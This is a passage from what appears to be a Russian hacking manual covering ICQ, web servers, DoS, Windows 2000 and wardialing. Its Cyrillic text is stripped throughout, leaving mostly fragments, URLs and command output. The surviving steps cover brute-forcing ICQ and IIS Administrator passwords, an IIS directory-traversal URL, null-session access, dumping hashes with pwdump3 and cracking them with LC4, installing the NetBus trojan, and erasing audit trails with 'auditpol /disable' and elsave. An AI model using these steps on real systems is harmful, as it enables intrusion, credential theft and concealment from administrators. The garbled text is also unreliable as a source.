7.
ICQ
ICQ Intelligent Call Query, .
ICQ [--] : I Seek You - ; ,
ICQ . ICQ
,
1998 Mirabilis,
( 40 ) AOL.
ICQ ,
ICQ ,
, . , , ICQ,
,
. , , - .
ICQ ,
ICQ.
ICQ , ICQ, ,
http://www.ICQ.com, http://mirabilis.com. ICQ - ICQ , , 1998,1999, 2000,
2002, ICQ 2003. ICQ
UDP, 4000, -
TCP, .
, ICQ, UIN (Unique Identification Number -
). UTN -
ICQ , .
, ICQ?
ICQ ,
. , ? .
-,
ICQ,
. -, ICQ ICQ
.
, ICQ, :
, UIN ,
, . , ICQ , - ICQ . , , - .
ICQ-, , IP-
ICQ-, , . , , DoS, 9 . ,
IP- ICQ, -
, ICQ- .
!
, ICQ-,
. ,
,
, - ,
.
ICQ,
Mirabilis
. ICQ, ICQ , .
,
.
ICQ
. - ,
ICQ
ICQ ICQ. ,
ICQ ; , ICQ- (,
LameToy
www.mirabilis.com). , ( )
,
.
,
, ,
, ,
.
, ICQ. .
. Sword-2000
ICQ Groupware Server, Alex-
ICQ Groupware Client, UESf, 1001, 1-1 ,
UIN, 1003. ICQ Groupware
http://www.icq.com.
ICQ, ICQ
Groupware, ,
, 1. - , ICQ - ,
ICQ
. ICQ
ICQ-,
ICQ-, ICQ- .
ICQ
). ,
, , , .
, ICQ-,
- , UIN UIN
. , ICQ (ICQ99a
ICQ99b) . DB-
( - ), DB Data Base - , ,
DB NewDB. LameToy ,
DB killer ( DB)
Setting ().
ICQ, .
, , LameToy, UIN , , , System Messenger - ICQ Team (http://www.icqinfo.ru/softjcqteam.shtml), ICQ Sucker
.
lf~ac)peca ICQ-
DoS ( ) ,
- . ,
, , Advanced ICQ IP
Sniffer - ICQ Team ( Web, , http://www.icqinfo.ru/sofl_icqteam.shtml).
. 7.2 Advanced ICQ IP Sniffer.
IP- ICQ UIN, Advanced ICQ IP
Sniffer ICQ, UIN . , , Your UIN ( UIN) Password
() Advanced ICQ IP Sniffer (
ICQ). Check ()
, ICQ
UTN , Info
() .
, Info () . 7.2
, ( ) IP- ICQ,
TCP-, ICQ . , , Ext IP ( ), Int
IP ( IP) TCP Port ( TCP). ,
ICQ- ( ).
ICQ, Advanced IP ICQ Sniffer,
ICQ server's address and port (
ICQ), Server () . 7.3.
. 7..
ICQ server's address and port
( ICQ)
ICQ, , , ICQ-,
ICQ- ICQ. ,
,
.
, ICQ, ICQ-MultiWar
(http://www.paybackproductions.com/), - ICQ Flooder
(. 7.4).
http://mht.hut.ru/icq/icq.html,
( , , ICQ , ). ICQ - ,
, , -
!
ICQ
ICQ,
ICQ, ,
. ,
, .
, , ICQ subMachineGun v1.4 (http://icq.cracks.ru/best.shtml), . 7.5.
ICQ
brute
force - , ,
.
.
ICQ ICQ subMachineGun
.
>
ICQ subMachineGun.
Reconnect if timeout (
) ICQ
.
Cut password length to 8 digits (
8- ) 8- .
> set timeout ( ) 15 .
> relogin ( ) ICQ
3.
ICQ subMachineGun
UIN . .
> ICQ subMachineGun Bruteforce
( ) UIN. .
Single
() UIN,
.
Single
() UIN.
UIN,
(...) Making victims list ( ), . 7.7.
Making victims list (
) Range () ,
, UIN ( - 100000)
( 900900).
Puc. 7.7.
UIN
, Generate ()
- UIN, , , ..
Add () UIN .
> UIN,
Open () UIN ( UIN ).
> - UIN ,
t0*"!. Clear () UIN ( ).
UIN, .
.
> ICQ subMachineGun Bruteforce ( )
. .
Single () , .
Single () .
> ,
(...) Make passlist
( ),
. 7.8.
Make passlist ( )
.
> Open () (
).
- ,
ICQ.
Puc. 7.8.
v Generator ()
Add (). , .
> , 0
*"**]. Clear ()
( ).
> , .
.
Force (). , ICQ
subMachineGun v1.4 (. 7.9).
Puc. 7.9. -
ICQ subMachineGun v1.4,
UIN, ( , . 7.9 ). ,
, 15 ,
ICQ.
- 45 ,
( ). ,
, , , , .. - .
...
(
-, , ICQ -
. ICQ , ICQ . ,
? - ! ,
? ,
ICQ- , .
,
.
? ,
Windows.
, . ,
ICQ ,
ICQ.
ICQ-, ,
ElcomSoft Advanced ICQ Password Recovery
(http://www.elcomsoft.com).
, .
. 7.10 Advanced ICQ Password
Recovery.
6.COPR 1.0 (cl 2000 Plea Goriunov and Andy Malvshev. ElcomSofl Co. L
, , ICQ
2002 2002.
2002 , UIN .dat,
.., , 207685174.dat
(207685174 - UIN ).
ICQ Password successfully found! ( ICQ ), (. 7.11).
Puc. 7.11.
!
. 7.11,
ICQ 99b - 2000b, ICQ 2002 ( ).
, ICQ
, - , - ICQ-. - , , (. [11]), Web- (. 8). ,
, ,
.
, ICQ
( ) , . , ,
,
ICQ. , ,
ICQ - ,
- . , .
ICQ,
.
. , , ICQ- - ICQ . ,
ICQ , UIN . -
?
, , , - ,
. , , - , , , ,
, , - . ICQ - , , ,
,
, , , , .
- ,
.. ICQ, , ,
. ,
ICQ ICQ,
ICQ (
, ICQ Team
(http://www.lcqteam.com)). ICQ- ICQ, ICQ- - ICQ.
- , .
, ? ,
, . ,
- , ? , ... ,
, , .
ICQ-, -
,
.
ICQ , . ICQ - ,
ICQ-.
ICQ DoS ...
.
ICQ
. -, ,
ICQ-, ICQ-, ICQ- .
ICQ,
ICQ. IP- , ,
ICQ. ICQ .
, ICQ-, UTN
. , ICQ-, -, , BlackICE Defender,
DoS. -
, , .
,
. ,
ICQ -
.
-, -
ICQ, ICQ. , IP- ICQ-,
- . ,
.
, . ICQ , PGP Desktop Security 2.9,
ICQ-
. ,
PGP- ( [7]).
8.
Web-caumoft
Web? , Web
,
. Web-
, Web- .
, , , .
, Web-
, ,
, , .
HTML Web-
( - ),
, . HTML
.
(
).
, Web-, , Web-,
, . HTTP, , , .
Web-,
, .
, Web-, DoS
,
, Yahoo.
,
Web-, , ( ) Web- ,
. Web , .
Web~cauma
Web
Web , , Web, Web,
, .
1 Web~cauma
,
Web-,
. ,
.
Web- - ,
, , , , Web .
Web- - Web- ,
, TCP- 80, , Web-,
( CVE, Web-), Web- - .
Web - - ASP, Java, CGI -
, .
Web - , -,
, -, ( !).
, , - . , , (cookie),
, .
- Web-
, , . , , CGI- , -
CGI- , , , .
- ,
Web- , .
- , Web-
, ,
, -
.
- , , ,
Web-, Web-, .
, (, . []).
, , , , IIS 5. ,
(
HTTP), CGI- (
) Web
( Web).
Web- , .
IIS , Web-,
. , Web- ,
- , .
- , Web-. - . , FTP- , , .
, .
Web- .
Web~cauma
,
Web-,
. , , ,
, . , , .
, Web- , - , , DNS-,
.
Web.
,
.
cbp
Web-
.
.
-, ,
- ,
. IP-, , ,
.
Whols .
-, HTML- Web- . HTML , Web, , .
, , , , JavaScript . , HTML- Web
Web- Teleport Pro.
, , Whols - , ,
Web.
whois (
Unix), Web- , whois Web-.
Whols
. , ,
. 1999
- Network Solution (http://www.networksolution.com),
, , InterNic (http://www.internic.net). / .
Web-,
Whois ( ),
. Whois
, ,
, DNS
. ,
RIPE NCC (Network Coordinate Center - ),
IP-
. Web- RIPE NCC (http://www.ripe.net),
. 8.1.
,
SuperScan (http://www.foundstone.com),
. 8.2.
SuperScan, .
> Start () - .
> Stop () .
> Scan type ( )
All list ports from ( ).
> Start ().
. 8.2.
SuperScan . , IP- 1.0.0.1 HTTP IIS 5.0, - Web. (
),
.
. 8.. IIS 5
Legion (http://packetstormsecurity.org/
groups/rhinoS),
- 1.0.0.1 . 8.3.
, - IIS 5,
- , ? .
| II5
IIS ,
HTTP (Hypertext Transfer Protocol - ) CGI (Common Gateway Interface - ), IIS, .
HTTP , , [12], - Web . HTTP ,
GET. Web-
(, ),
GET,
,
,
http://www.anyserver.com/documents/order.html.
order.html /documents IIS,
c:\inetpub\wwwroot\documents.
CGI , , [12],
.
HTTP, :
http://www.anysite.com/scripts/MyScript?napaMeTp1+napaMeTp2
MyScript - , /scripts IIS, a
?1+2 ,
MyScript. IIS ,
, ,
.
CGI, ASP
(Active Server Pages - ) ISAPI (Internet Server
Programming Interface - ). ASP :
http://www.anysite.com/scripts/MyScripts7napaMeTp1 =1&2=
2
MyScript.asp, , , HTML. ISAPI
, ISAPI. HTTP:
http://www.anysite.com/isapi.dll?1&2
, IIS, , .
HTTP ,
IIS . IIS 2.0 :
http://www.anysite.com/../../../../../winnt/secret.file
Web- , secret.txt.
- Windows, ACL.
IIS , Web-
[3]. IIS
, , , , ,
SecurityLab.ru (http://www.securitylab.ru).
IIS,
netcat (http://www.atstake.com), (netcat - - [3] netcat IIS).
netcat Sword-2000
,
. netcat .
> Alex- netcat,
nc -vv 1.0.0.1 80.
v
GET / HTTP/ 1.0 111. . 8.4.
GET / HTTP/1.0
IIS. . 8.4, HTML,
.
c:\test\netcat>nc -vv 1.0.0.1 80
HTTP
sword-2000.sword.net
/1.0
Server: Microsoft-IIS/5.0
Date: Fri, 28 Feb 2003 12:55:40 GMT
Content-Type: text/html
Content-Length: 87
<html><head><title>Error</title></head><body>The parameter
</html>sent 17, rcvd 224: NOTSOCK
C:\test\netcat>
ALEX-1 [1.0.0.7] 80 (http) open
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 01 Mar 2003 07:16:42 GMT
. 8.5. 1-1 !
, 1-1
! Sword-2000 ( Windows 2000 Advanced
Server Service Pack 2) - Microsoft ,
2000 . ,
URL ,
(. [3], [4], [11]).
, Windows 2000 ?
- ,
? ,
.
Web-, IIS, -
, Web-.
, Web- CGI (Common Gateway Interface - ), , Web .
CGI, , .
Web-,
.., IIS, System, . .
, CGI- , , . , -
, ,
,
. , - .
, , Perl, , ., , , ,
,
D@MNED CGI Scanner 2.1 (177 exploits)
, ,
\>
. - , - , ,
Web, -
.
, ,
CGI-, , READY
Web-, Puc. 8.6. CGl-
D@MNED CGI Scanner 2.1
.
CGI-
D@MNED
CGI
Scanner
2.1
(http://shieldandsword.narod.ru/soft/scansec/
scansec.htm). . 8.6 ,
.
, D@MNED CGI Scanner 2.1.
Scanners log ( )
. , , , .
Scan list ( ), . 8.7, , .
,
, .
-
. , ,
.
, .
Scan subnet ( ) -, . , : 234.56.78.1 - 8.
CGI holes ( CGI) (. 8.8) CGI-,
.
, ,
,
Scan list ( ).
1 g UttiMNtO CGI
.1 (177 exploits)
. 8.8.
CGI-
. 8.7.
2
D Use proxy
|
:
. 8.9. CGl-
!
English
. 8.10. CGl-
Spy () (. 8.9),
Web- ( - IIS 5.0),
( ).
Option (), . 8.10,
-, . - -
- -,
- ( , ...).
D@MNED CGI Scanner 2.1 .
1-1
IP- 1.0.0.7, .
> Scan list ( )
http://www.altavista.com IP- 1.0.0.7.
> Scanner log ( ) . ,
. 8.11.
.
( . 8.11 200
500) ;
. ,
200
- , 500 - .
200 (
- SUCCESS)
.
. 8.11.
,
IIS 5.0
D@MNED CGI Scanner 2.1
.
, , .
, 1, , MITRE CVE (http://www.mitre.org). ,
. 8.11, IIS .htr .idq.; MITRE.
CVE-2001-0500
Buffer overflow in ISAPI extension (idq.dll) in Index Server 2.0 and Indexing Service 2000 in IIS 6.0 beta and earlier allows remote attackers to execute arbitrary
commands via a long argument to Internet Data Administration (.ida) and
Internet Data Query (.idq) files such as default.ida, as commonly exploited by
Code Red.
( ISAPI (idq.dll) Index Server 2.0 Indexing Service 2000 IIS 6.0 -
.ida (Internet Data Administration -
) .idq (Internet Data Query - ),
, default.ida, Code Red.)
Reference: BUGTRAQ:20010618 All versions of Microsoft Internet Information
Services, Remote buffer overflow (SYSTEM Level Access)
Reference: MS:MS01-033
Reference: CERT:CA-2001-13
Reference: BID:2880
Reference: XF:iis-isapi-idq-bo(6705)
Reference: CIAC:L-098
, CGI- IIS
- IIS. , ,
http://www.securitylab.ru. ,
, .
" IIS .htr
, Web . "" , .htr (ISM.DLL).
IIS 4.0 5.0 SP2 1 2002.
IIS - , , . ISAPI , .htr , ISM.DLL.
ISM.DLL . IWAM_COMPUTERNAME.
. IIS 4.0-5.1."
, SecurityLab.ru Unix Pyton, . ,
, ( ,
).
CGI Vulnerability Scan (http://www.wangproducts.co.uk),
. 8.12.
Web .
Teleport Pro.
Web'cnsuc)ep*feLeport fro
Teleport Pro Web-, Web- . Teleport Pro , ( ), , Web Web-.
, ,
- spider - .
Web-
Web - . , , , . Teleport Pro .
Web-
.
Web-, .
Web- .
Web-.
Web-, Web-.
Web- .
Web-.
Teleport Pro , Web ,
.
Teleport Pro , , Web.
, , Web.
Start () - , Teleport Pro ,
Web, Web-, , .
Web
. , Teleport Pro Web
, .
Web- , Web, .
Teleport Pro . 8.13.
.
> Teleport Pro File New Project Wizard
( ). (. 8.14).
. 8.14
Teleport Pro.
Create a browsable copy of website on my hard drive - Web- .
I
. 8.14.
Teleport Pro
Duplicate a website, including directory structure - Web-,
.
Search a website for files of certain type - Web- .
Explore every site linked from a central site - ,
.
Retrieve one or more files at known addresses -
.
Search a website for keyword - Web- .
Project Wizard - Step 2 of 4
Starting Address
Enter an Internet address to serve es the starting location for
this project. Examples of valid Internet addresses are
"www. micro soft. com", "www.netscape.com/products/", and
"www.ibm.com/home/ind8x.htm".
|3
I
. 8.15.
Web
- Web . , Next
(). (. 8.15).
*
,
. , ,
Teleport Pro 1.29.1959 HTTP FTP.
Web;
, New Address ( )
.
Up to ... links from this starting point ( ...
) Web , ( 3).
Next ()
(. 8.16).
Project Configuration
When dealing the local website, retrieve:
Justtexl
Text end graphics
Text graphics, and sound
<3> Everything
Puc. 8.16.
. 8.16 , Web
. :
Just text ( ) - .
Text and graphics ( ) -
.
Text, graphics, and sound (, ) , .
Everything () - .
, , Account ( ) , Password
() - .
Next ()
(. 8.17).
Congratulations!
YouVe just created oTeleport Pro project!
When you press Finish, you will be asked to save the project
Choose name for it in the Save dialog box.
Teleport Pro will save the project then create a folder, named
pfier your project in which it will store any retreived files.
Whenyou're readyto run the project pressthe Stari( )
button on the toolbar, or select Start Irom the Project menu.
Puc. 8.17. !
. 8.17 ,
Start ()
Start () Project ().
> Finish () (. 8.18) .
Save in: | Si Teleport results
<
'3 yahoo
yahoo
Filename:
Iklingonj
Save as type:
Project
Properties ( ), . 8.19
Project * Project Properties ( * ).
Summary | File Retrieval | Browsing/Mirroring | Exploration | Exclusions | Netiquette | Advanced
0 Always save KTML pages
D Re plicate the directory structure of remote servers
El Use MSIE-compatible filenames (appends .htm to HTML files where necessary)
Cancel
I I
Apply
Puc. 8.19.
Project Properties ( ) , .
, Browsing/Mirroring (/ ), . 8.19.
Browsing/Mirroring (/ )
,
, ,
,
. .
Always save HTML pages ( HTML) Teleport Pro HTML, .. Web-,
, ,
Web, . , Web-
, ,
Web- .htm .html.
Replicate the directory structure of remote servers (
) 136
Web-
, .
,
, .
Use MSIE-compatible filenames (append .htm to HTML files where
necessary) ( , MSEE (
.htm HTML)) IE ,
HTML, .htm .html (, .shtml .pi). ,
, Teleport Pro
HTML, .htm .html,
.
Linkage System ( ) , , ,
. Localize links for all retrieved files
( ) ,
, Web.
:
Link to a message that explains why the file was not retrieved -
, , . , ,
, .
Link to the Internet address for the file - .
,
.
Link to a place where the local file will be stored - ,
, ..
Web .
Web- , .
Teleport Pro
HTML- , , , , Java, . , -
.
Linkage System (
) Link using 8.3 filenames (, 8.3) , DOS . , ,
8.3.
Relink all files in the project now ( )
HTML
, .
, , , Web-. HTML
Web-? , Web- , ,
Web-. , Web* HTML.
?
-, - ,
. , , , - ,
. , - .
-, - , , - , , . , , , Web-
CGI. HTML CGI-,
.
, . ,
. , -
.
, ,
, , Web , ,
Retina (http://www.eeye.com/html/Products/Retina/). ,
Teleport Pro (http://www.tenmax.com) 138
Web-
HTML-
, Web.
, Web ? ,
Web, ,
- . HTML, HTTP.
, , .
Web-,
.
- ,
Web- ,
/ Administrator/password
( , , [3] , (!!!)
Web).
, , Brutus Authentication Engine Test 2 ( 2), Brutus AET2 (http://www.hobie.net/brutus), , .
, HTTP.
. 8.20 Brutus.
. 8.20. Web-
IIS
Sword-2000, .
> Target () IP- , 1.0.0.1.
> ()
, . HTTP (Basic
Authentication) (HTTP ( )) -
HTTP, ( IIS
Windows IIS).
Authentication Options ( ) , . Administrator,
Use Username ( ),
Single User ( ).
> Pass Mode ( ) Brute
Force ( ), , .. .
> Range (). Brutus - Brute Force Generation (Brutus - ), . 8.21.
Brutus - Brute Force Generation Brutus - Brute Force Generation
Q
(Brutus -
Min Length |0 |" Digits only
) - - Lowercase Alpha]
Length | [-
, Uppercase Alpha
|
OK
| Cancel
IIS - Mixed Alpha
Alphanumeric
. Full Keyspoce
;
Custom Range |e7aoinsmldcumfpg^bvfcxjqzl 234567890 \
Min Length (
), Max Length ( Puc. 8.21.
) - 3.
, Digits only ( ).
.
> Start () Brutus - 2 (. 8.20) . Brutus - 2 . 8.22.
, ,
, .
Web, , - . Web
, . , , . , Windows NT/95/98,
Web- CGI Vulnerability
Scan D@MNED CGI Scanner 2.1, ,
, Web, ,
.
, Web-, , ,
. Web - ,
Web- .
, Web- - , Retina, , , [7]. Web- -
, .
9.
UoS
, TCP/IP, TCP/IP , . , , - ,
DoS (Denial of Service ). DoS -, TCP/IP .
DoS , . DoS ,
, Yahoo, eBay, CNN.com, www.Microsoft.com,
, [3].
,
- , , , .
DoS ,
,
, , .
, [3], DoS
, . , , , , DoS Web-; , DoS
. ,
, - , DoS.
,
DoS ,
. DoS , ,
,
, - - IDS (, BlackICE Defender
(http://blackice.iss.net/)), .
DoS,
, .
'
DoS ,
.
, , DoS .
- ,
, , ( Web- Yahoo).
. , , 1 ( 1544 /), , , 56 / ( ).
- ,
, , .
.
- ,
.
- , ,
.
- , .
,
.
- ,
, .
.
DoS , , .
,
. 1, Web- [3], , . ,
, .
, . , - UDP ICMP.
DoS, , ,
/.
.
, UDP
UDP, . , DoS, UDP Flooder 2.0
Foundstone (http://www.foundstone.com), , - , .
. 9.1 UDP Flooder 2.O.
UDP Flooder 2.0,
DoS 1-3
IP- 1.0.0.5 .
> UDP Flooder 2.O.
IP/hostname (IP/ ) IP- NetBIOS - IP- 1.0.0.5.
> Port () , 80, HTTP-.
Puc. 9.2.
80%
DoS
, -
UDP, 50%
. - ,
LAN Ethernet I DBase.
4>) ICMP
( ) ICMP (Internet Control Message Protocol -
)
UDP. . 9.3 X-Script ICMP
Bomber.
Aht3K3 Smurf
, , ,
DoS ? Smurf, .
, , Smurf
. ECHO () ICMP,
. IP- ,
. , , -
10 , .
, DoS, DDoS (Distributed DoS). DDoS -, .
, ,
DoS . DDoS WinTrinoo (
http://www.bindview.com), , , DDoS Win32. 2000 DDoS
, Web- (, , , WinTrinoo).
- Foundstone , ,
DoS.
DoS, , , , , . , , DoS,
,
. , .
DoS
PortFuck, ( TCP- , ). PortFuck - TCP- , . ,
,
, TCP- ,
, , .
. 9.5 PortFuck.
Nuke
Nuke ,
DoS, , , -, .
- , . TCP/IP
ICMP, ICMP .
- -
, .. - ICMP, , ,
. ,
.
- - ,
, , ,
.
Web-, , . Nuke -
.
DoS Nuke , ,
Windows 2000/XP ,
Windows 9x.
Windows 2000/XP,
(, [4]). ,
Windows 9x,
, .
,
.
Nuke - , . ,
Windows Nuke'eM version 1.1, . 9.8.
Nuke , - Alex-2, IP- 1.0.0.4
Windows 95. .
> Address () Windows Nuke'eM version 1.1,
. 9.8, IP-
Alex-2 (Windows 95), Alex-3 (Windows XP) Alex-1 (Windows 2000).
- Add ()
.
Puc. 9.8.
>
- ICMP- Source Quench ( ), . , ICMP- Destination Unreachable:
Datagram Too Big ( : ).
, ICMP DoS , , , , ,
,
.
, , DoS,
TCP/IP - NetBIOS Sir Dystic, nbname, NBNS IP-
NetBIOS Windows 2000 [4]. nbname, , NetBIOS NetBIOS. TCP/IP - , , , , net send.
, nbname
- , nbname, ,
nbname.
DoS - ,
. ,
, , . , [11] , , DoS, , , Web- .
, Web-. - , DoS.
DDoS - , , , , ,
-. , Foundstone.
,
, .. , 1 , Foundstone .
DDoS, , Foundstone .
Foundstone,
(Robin Keir),
http://www.foundstone.com DDoSPing 2.0,
-. ,
UDP, UDP .
. 9.11 DDosPing 2.0, .
. 9.11. DDoS
DDoSPing 2.0 .
> Start IP address ( IP-) End IP-address (
-) IP- .
> Speed () , , LAN.
> , Configuration () . 9.12).
. 9.12.
> , Windows defaults
(Windows ) Unix defaults (Unix ), Windows Unix, .
> , DDoSPing 2.0 , WinTrinoo, ,
- StachelDraht Tribe Flood Network. ,
(. 9.12).
> DDoSPing 2.0 . 9.11 Start () . Infected Hosts ( ).
, -
Zombie Zapper (http://razor.bindview.com/tools/
ZombieZapper__form.shtml), WinTrinoo.
. 9.13 , , ,
DDoSPing 2.O.
, , , DoS - , , 1 . , , - ,
, - Web- - .
- , , ,
, ,
. DoS
, -
(-, , )
Web-.
IP- ICMP-!
EDS DP-, , , ,
Web. , - , .
DoS , -
- !
10.
Windows ZOOO/Xf
, , - () ,
, - , ( , , [1]).
, , , -
-
. ,
.
?
TCP/IP, . TCP/IP . .
1 ,
. - , , [11].
, , , .
1, ,
- .
cemu*TCf/lf
IP- ,
ping
, W2RK (Windows 2000 Resource Pack).
- ICMP (Internet Control Message Protocol -
). . . 10.1 ping Sword-2000.
Windows 2000/XP
from 1.0.0.1: bytes=32 time<1ms TTL=128
from 1.0.0.1: bytes=32 time<1ms TTL=128
from 1.0.0.1: bytes=32 time<1ms TTL=128
from 1.0.0.1: bytes=32 time<1ms TTL=128
- ,
, [3].
SuperScan (http://www.foundstone.com),
(. . 10.2).
. 10.2 IP-
1.0.0.1-1.0.0.7. ,
Sword-2000,
- TCP- 139 NetBIOS. ,
- .
, , , . Windows NT/2000/XP -
NetBIOS 139.
&
Windows NT/2000, .
. Windows NT/2000/XP
.
net use \\1.0.0.1\IPC$ "" /user:""
1.0.0.1 - IP- Sword-2000, IPC$ -
Inter-Process Communication -
( ), ""
, /user:"" .
, , .
, SMB (Server Message
Block - ). ,
.
,
;
.
Alex- ( Windows XP)
Sword-2000 ( Windows 2000).
Sword-2000 Alex- - , Windows XP
Windows 2000,
, , .
Windows NT/2000/XP. net view nbtstat W2RK. net view .
C:\>net view /domain
SWORD
.
SWORD. , .
C:\>net view /domain:SWORD
\\ALEX-3
\\SWORD-2000
.
Sword-2000 .
nbtstat; . 10.3.
. 10.3 ,
NetBIOS, NetBIOS. ,
<00> , <00>
- . <03> , ,
<03> - , Administrator. MSBROWSE, <1 >
SWORD.
C:\Documents and Settings\Alex>nbtstat -A 1.0.0.1

Sword:
Node IpAddress: [1.0.0.5] Scope Id: []

NetBIOS Remote Machine Name Table

SWORD-2000      <00>  UNIQUE  Registered
SWORD-2000      <20>  UNIQUE  Registered
SWORD           <00>  GROUP   Registered
SWORD           <1C>  GROUP   Registered
SWORD           <1B>  UNIQUE  Registered
SWORD           <1E>  GROUP   Registered
SWORD-2000      <03>  UNIQUE  Registered
SWORD           <1D>  UNIQUE  Registered
..__MSBROWSE__. <01>  GROUP   Registered
INet~Services   <1C>  GROUP   Registered
IS~SWORD-2000.. <00>  UNIQUE  Registered
ADMINISTRATOR   <03>  UNIQUE  Registered

MAC Address = 52-54-AB-14-55-B4
, pwdump3.exe Windows NT/2000/XP LC4
.
, NetBIOS TCP/IP
( Windows 2000/XP )? , , SNMP (Simple
Network Management Protocol - ), Windows NT/2000/XP. , SNMP, , , [11].
, , ,
.
Windows NT/2000/XP .
, .
,
, , .
- , ..
, . nbtstat MIB,
- , (. [3] [4]). ,
, . ,
.
D:\>net use \\1.0.0.1\IPC$ * /u:Administrator
* ,
IPC$ Administrator.
:
Type password for \\1.0.0.1\IPC$:
. ,
- 165
, , ,
. , , , SMBGrind, CyberCop Scanner Network Associates. (
[3]).
- .
, , , .
Windows NT/2000/XP , SAM (Security Account Manager - ). SAM
(, , ) ,
, ,
. ,
- , , , , .
,
SAM, LC4 ( L0phtcrack,
- LC4) (http://www.atstake.com/research/redirect.html), .
Samdump - SAM.
Pwdump - , . Syskey SAM ( Syskey . 2).
Pwdump2 - , Syskey.
.
Pwdump3 - , Pwdump2, .
Syskey, 2; ,
SAM,
Windows 2000/XP , Windows NT
.
2 , , , .
Sword-2000
Pwdump3, :
C:\>pwdump3 sword-2000 > password.psw
Sword-2000,
password.psw.
(Notepad) (. 10.5).
Puc. 10.5.
Sword-2000
, password.psw Administrator,
. , LC4, , ,
Sword-2000 (. 10.6).
Puc. 10.6. ,
Sword-2000
Celeron 1000 , 007
. 167
,
LC4.
, , -
NetBIOS - , , .
, .
, - ,
, . -
, .
- ,
. , .
Invisible Key Logger Stealth (IKS) (http://www.amecisco.com/iksnt.htm),
3 . IKS -
,
.
- , ..,
, NetBus (http://www.netbus.org)
2 (Back Orifice 2000) (http://www.bo2k.com),
.
NetBus 2 - [3].
,
. ,
, , . - ,
, -
, ,
.
,
NetBus, cDc (Cult of the Dead
Cow - ).
NetBus - , ..
, , , ,
, . ,
, . - ,
. , ,
- , . 1% NB Server [Off] 1
NetBus
: -
Sword-2000 (- 1.0.0.1), -
Alex-3 (IP- 1.0.0.5).
.
NetBus
, NBSvr (
).
NBSvr , . 10.7.
NetBus
NetBus NBSvr .
.
> NB Server ( NB) Settings ().
Server Setup ( ), . 10.8.
Accept connections ( ).
> Password () NetBus.
> Visibility of server ( )
Full visible ( ),
NetBus ( ).
> Access mode ( ) Full access ( ), Sword-2000 .
> Autostart every Windows session ( Windows),
.
> . .
- NetBus.exe.
> NetBus.exe, NetBus 2.0 Pro,
. 10.9.
. 10.9. NetBus
Host Neighborhood * Local ( *
). Network (), . 10.10.
Microsoft Windows (Microsoft Windows Network)
(. 10.11).
NetBus,
Sword-2000, Add (). Add Host ( ), . 10.12.
. 10.11.
Puc. 10.10.
NetBus
! Sword-2000,
Windows,
.
, NetBus,
IKS,
. IIS (. 8), ,
. (
).
, ,
, -
, .
, / .
, . ,
, auditpol.exe W2RK. ( ) ,
.
.
C:\Auditpol>auditpol \\sword-2000 /disable
:
Running
Audit information changed successfully on \\sword-2000...
New audit policy on \\sword-2000...
(0) Audit Disabled
System                   = No
Logon                    = No
Object Access            = No
Privilege Use            = No
Process Tracking         = Success and Failure
Policy Change            = No
Account Management       = No
Directory Service Access = No
Account Logon            = No
\\sword-2000 - , /disable
. auditpol.exe -
, ,
, , .
, auditpol /?,
. ,
/ SAM,
pwdump3.exe
SAM.
Windows 2000/XP,
( , ).
.
> (Start)
(Settings * Control Panel).
>
(Administrative Tools).
>
(Computer Management). .
>
Windows 2000/XP
Windows 2000.
.
C:\els004>elsave -s \\sword-2000 -
-s , -
. , . ( elsave /? ,
).
, -
elsave.exe
,
(Computer Management).
? ( ) W2RK, SAM,
. .
.
- .
, , ,
. Windows
( , , , [7]). Windows, IDS.
, IDS, , IP-
(, BlackICE Defender). , ,
, -
..
11.
, , . , ,
, (
, ), - , , . ,
- .
- , , .
, ,
, - ,
. -- -
- , ! , , - , , .
, , . , , - , ,
, .
- , -
Login Hacker, , THN-Scan (http://www.infowar.co.uk/thc/) ToneLock
Minor Threat&Mucho Maas.
, DOS,
.
, (
) - PhoneSweep
(http://www.sandstorm.com) Sandstorm. ,
, ,
, . PhoneSweep,
- , Sandstorm.
- PhoneSweep , , .
, PhoneSweep, , , , - , . , , , ,
, , ,
. - , , ,
.
- , . , ,
. , . Whols (, http://www.ripe.net). Whols , , , - .
- -
.
, ,
.
,
, . , ,
- ,
, .
- -
, , ,
.
, - . , PhoneSweep
,
(, ).
fhoneSweep .
PhoneSweep - , .
, - .
-
Windows.
PhoneSweep . PhoneSweep .
Windows 95/98/NT/2000/XP.
.
/
(Point-to-Point protocol - ).
.
, 1 4.
, .
PhoneSweep.
fttoneSweep
PhoneSweep Demo , -.
(. 11.1).
, (
).
Start (). ; Start (), ,
180
. 11.3, . , Default ,
Setup ().
PMC. 77.4.
Save (). ,
.
Revert (). ,
, .
Default ( ). .
Import ().
/ bruteforce.txt.
Export (). ( ),
.
Report (). , , .
Graph ().
( Excel 2000).
What's This? ( ). ,
PhoneSweep 4.4 Demo - .
PhoneSweep 4.4 Demo
(. 11.5) ,
.
, Profiles
(), Setup (), . 11.3.
Open (). .
Profiles () . 11.5.
New profile ( ). . Profiles () . 11.5.
Copy profile ( ).
( ).
Profiles () . 11.5.
[Fig. 11.5: Profiles ()]
Delete (). .
Profiles () . 11.5.
Save (). ,
, . Profiles ()
. 11.5.
Undo (). . Profiles ()
. 11.5.
Freeze (). History
() .
Freeze () Thaw (). Freeze ()
History () . 11.6.
Thaw (). History ().
History () . 11.6.
Clear (). . History () Phone Numbers (
) . 11.6.
[Fig. 11.7: Add Phone Numbers dialog]
Delete ().
.
Add/Save (/).
, Add Phone Numbers ( ).
PhoneSweep
. ,
. ,
,
.
Sweeping Indicator ( ) - ,
.
Scheduled Start On/Off ( /) - ,
( ,
).
Scheduled Start Time ( ) - OFF.
Scheduled Stop On/Off ( /) - ,
( ,
).
Scheduled Stop Time ( ) - OFF.
Effort level ( ) - - , , .
Phonenumbers to Dial ( ) - , . , .
Report Status ( ) - ,
, ; - ;
- .
Time Period ( ) - - , , .
Remote Access Indicator ( ) - , PhoneSweep
. , .
-
PhoneSweep , .
Working with PhoneSweep
PhoneSweep, .
> PhoneSweep Setup (), . 11.5 .
> Phone Numbers ( ),
. 11.2, , Add (), Add
Phone Numbers ( ), . 11.7,
.
> PhoneSweep Start ()
.
, ,
(dialing rules).
PhoneSweep , ,
.
PhoneSweep, , , , -
.
, PhoneSweep
.
.
Add Phone Numbers ( ) (. 11.7)
: Business (), Outside (), Weekend
().
PhoneSweep ,
, , , .
Time (), Setup (), . 11.8.
[Fig. 11.8: Time tab under Setup]
Effort () . 11.9.
[Fig. 11.9: Effort tab of PhoneSweep 4.4 Demo, showing Current Effort Level, Set Level, Scan For and the username/password list]
. 11.9, ,
. Set Level ( ) ,
( Connect ()),
( Identity
()), (
Penetrate ()). Scan For () / ,
(, , , ?).
